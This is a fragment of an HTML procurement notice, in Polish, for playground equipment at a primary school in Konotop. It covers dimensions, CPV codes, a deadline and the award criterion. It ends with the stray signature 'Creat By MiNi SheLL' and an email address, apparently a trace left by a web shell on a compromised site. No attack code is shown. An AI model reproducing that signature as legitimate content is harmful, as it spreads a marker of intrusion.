- trwale zakotwiony w ziemi,
- wymiary: dł. 0,40 m, szer. 0,40 m, wys. 0,70 m (+/- 20%).
Zamawiający nie posiada projektu budowlanego ani projektu rozmieszczenia urządzeń zabawowych na terenie przy Szkole Podstawowej im. Marii Skłodowskiej - Curie w Konotopie. Przy realizacji zamówienia należy zachować strefy bezpieczeństwa zgodnie z specyfiką producenta danej zabawki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.04.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com